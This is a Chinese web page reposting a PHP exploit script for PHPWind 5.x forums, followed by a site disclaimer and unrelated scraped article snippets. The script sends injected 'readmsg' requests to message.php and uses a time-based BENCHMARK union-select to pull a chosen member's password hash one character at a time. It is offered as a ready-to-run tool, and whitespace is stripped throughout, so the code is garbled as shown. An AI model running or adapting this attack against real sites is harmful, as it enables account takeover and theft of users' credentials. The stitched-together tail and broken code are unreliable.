时间:2021-05-26
忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来.
程序代码
<?php
print_r("
+------------------------------------------------------------------+
ExploitForPhpwind5.XVersion
BYLoveshell
JustForFun:)
+------------------------------------------------------------------+
");
ini_set("max_execution_time",0);
error_reporting(7);
$bbspath="$argv[2]";
$server="$argv[1]";
$cookie='1ae40_lastfid=0;1ae40_ol_offset=776;1ae40_ck_info=%2F%09.72m.net;1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D;1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F;
$useragent="Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1)";
$uid=intval($argv[3])>0?intval($argv[3]):1;
echo"\r\n#Logging\t........";
if(islogin())echo"LoginOk!\r\n";
elsedie("NotLogin!\tCheckYourCookieandUseragent!\r\n");
echo"#Testing\t........";
if(test())echo"Vul!\r\n";
elsedie("NotVul");
$hashtable='0123456789abcdef';
$count=0;
echo"#Cracking\t\r\n\r\n";
for($i=1;$i<=16;$i++){
echo"第\t$i\t位:";
$subpass=crack($i+8);
$password=$password.$subpass;
echo"$subpass\r\n";
}
echo"Password:\t$password";
echo"\r\nGoodLuck$countTimes\r\n";
functionsend($cmd,$path)
{
global$bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;
$path=$bbspath."$path";
$message="POST".$path."HTTP/1.1\r\n";
$message.="Accept:*/*\r\n";
$message.="Accept-Language:zh-cn\r\n";
$message.="Referer:http://".$server.$path."\r\n";
$message.="Content-Type:application/x-www-form-urlencoded\r\n";
$message.="User-Agent:".$useragent."\r\n";
$message.="Host:".$server."\r\n";
$message.="Content-length:".strlen($cmd)."\r\n";
$message.="Connection:Keep-Alive\r\n";
$message.="Cookie:".$cookie."\r\n";
$message.="\r\n";
$message.=$cmd."\r\n";
$count=$count+1;
$fd=fsockopen($server,80);
fputs($fd,$message);
$resp="<pre>";
while($fd&&!feof($fd)){
$resp.=fread($fd,1024);
}
fclose($fd);
$resp.="</pre>";
if($debug){echo$cmd;echo$resp;}
//echo$resp;
return$resp;
}
functionsqlject($sql){
global$uid;
$data='action=pubmsg&readmsg=0)';
$data=$data."unionselectBENCHMARK(1000000,md5(12345))frompw_memberswhereuid=$uidand$sql".'/*';
$echo=send($data,'message.php');
preg_match("/Total(.*)\(/i",$echo,$matches);
if($matches[1]>2)return1;
elsereturn0;
}
functiontest(){
global$uid;
$data='action=pubmsg&readmsg=0)';
$echo=send($data,'message.php');
if(strpos($echo,'MySQLServerError'))return1;
elsereturn0;
}
functionislogin(){
global$uid;
$data='action=pubmsg&readmsg=0)';
$echo=send($data,'message.php');
if(strpos($echo,'login.php"'))return0;
elsereturn1;
}
functioncrack($i){
global$hashtable;
$sql="mid(password,$i,1)>0x".bin2hex('8');
if(sqlject($sql)){
$a=8;
$b=15;}
else{
$a=0;
$b=8;
}
for($tmp=$a;$tmp<=$b;$tmp++){
$sql="mid(password,$i,1)=0x".bin2hex($hashtable[$tmp]);
if(sqlject($sql))return$hashtable[$tmp];
}
crack($i);
}
?>
点击下载此文件
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
PHPWIND&DISCUZ!CSRF漏洞影响版本:Discuz!6.0.0&6.1.0&7.0.0PHPWIND6.0&6.3&7.0漏洞描述:PHPWIND
猫猫传给我一个phpwind2.0.1漏洞利用程序,可以直接在目录中写入一个木马。怎么说呢,这个漏洞是pinkeyes发现的,本文旨在分析这个漏洞的思路。直
正在看的db2教程是:IBMDB2日常维护汇总(九)。 167.REPEAT(EXP1,EXP2) 返回EXP1重复EXP2次后的字符串. SELECTC
最近在设计一款产品,需要POST登录PHPWind,然而众所周知,PHPWind9(以下简称pw9)自身拥有安全策略,详情各位可以自己去phpwind官方论坛看
描述exp()方法返回x的指数,ex。语法以下是exp()方法的语法:importmathmath.exp(x)注意:exp()是不能直接访问的,需要导入mat